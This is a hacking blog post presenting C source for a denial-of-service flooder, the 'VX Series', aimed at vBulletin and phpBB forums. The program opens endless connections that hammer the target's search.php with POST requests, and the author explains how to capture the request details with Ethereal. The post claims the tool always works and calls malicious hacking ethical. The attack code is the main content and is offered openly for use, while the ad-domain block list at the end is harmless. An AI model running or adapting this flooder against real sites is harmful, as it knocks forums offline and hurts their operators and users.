For reference I called this the "VX Series", after the nerve gas which has the same characteristics of attack as this program has.
I have tested this on vbulliten, and phpbb. A bit of knowledge has to be used when writing this, as the writer will have to manually change certain variables in order to make this work. But because of this, versions of the forum do not matter, as when you edit it, you will specify certain changes. The easiest way of getting the correct syntax for a post method, is to run ethereal while performing a search, and then do a "follow stream" in ethereal, which will display the information your browser sent to the forum.
I am confident that I am not "arming kindergardeners" with this exploit. Though it is very easy to implement, knowing how to follow streams in ethereal is a very hard concept to master....unless of course you know what you're doing, in which case it is easier than that drunk sorority chick who's name you've already forgotten.
#include "stdio.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"
#include "netdb.h"
int main() {
int sockfd, portno = 80, n, x=1;
struct sockaddr_in serv_addr; struct hostent *server;
server = gethostbyname("someforum.com");
char *headerinfo=(char *)malloc(4*BUFSIZ);
while(1){
++x;
//this is where you enter the info from ethereal.
sprintf(headerinfo, "POST /search.php HTTP/1.1\r\n"
"Host: \r\n"
"User-Agent: \r\n"
"Accept: \r\n"
"Accept-Language: \r\n"
"Accept-Encoding: \r\n"
"Accept-Charset: \r\n"
"Keep-Alive: 500\r\n"
"Connection: keep-alive\r\n"
"Referer: \r\n"
"Content-Type: \r\n"
"Content-Length: \r\n\r\n"
"search_variable");
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0){
perror("ERROR opening socket");
exit(1); }
if (server == NULL) {
perror("ERROR, no such host\n");
exit(0);
}
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr,(char *) //&serv_addr.sin_addr.s_addr,server->h_length);
serv_addr.sin_port = htons(portno);
connect(sockfd,&serv_addr,sizeof(serv_addr));
write(sockfd,headerinfo,strlen(headerinfo));
close(sockfd);
write(1, ".", 1);
}
return 0;
}
This has worked every single time I have run it. So if it does not work for you it means 1) you did not add carrots in your include instead of the "", 2) you did not compy information from ethereal correctly 3) you are an idiot. One of those three will always be the reason it did not work.
If the human body was never exposed to ailments, it would be impressivly vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressivly vulnerable to cyber terrorism. With out the creation of a malicious hacking, Afganistan could have destroyed America's economy with a ping flood. This is why I encourange maclicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lay. This isn't a 100% information base, as I only publish things I have been able to implement on myself. No credit is needed anywhere . However if you are a publisher, I would appriciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagerize then that is my biggest compliment . If my work is good enough, I will be approached and asked to write more ... this is natural selection of the digital age .
Previous hacks
Previous Hacks
This link kills spam
spam IP addresses
These are sites I block at my firewall.
cdn2.gms1.net
gms1.net
servedby.advertising.com
advertising.com
a.tribalfusion.com
tribalfusion.com
pimpslord.com
altfarm.mediaplex.com
mediaplex.com
ad.yeildmanager.com
yeildmanager.com
doubleclick.net
isg32.casalemedia.com
casalemedia.com
Two very recommended books:
. . The only hacking forum I have found worth mentioning here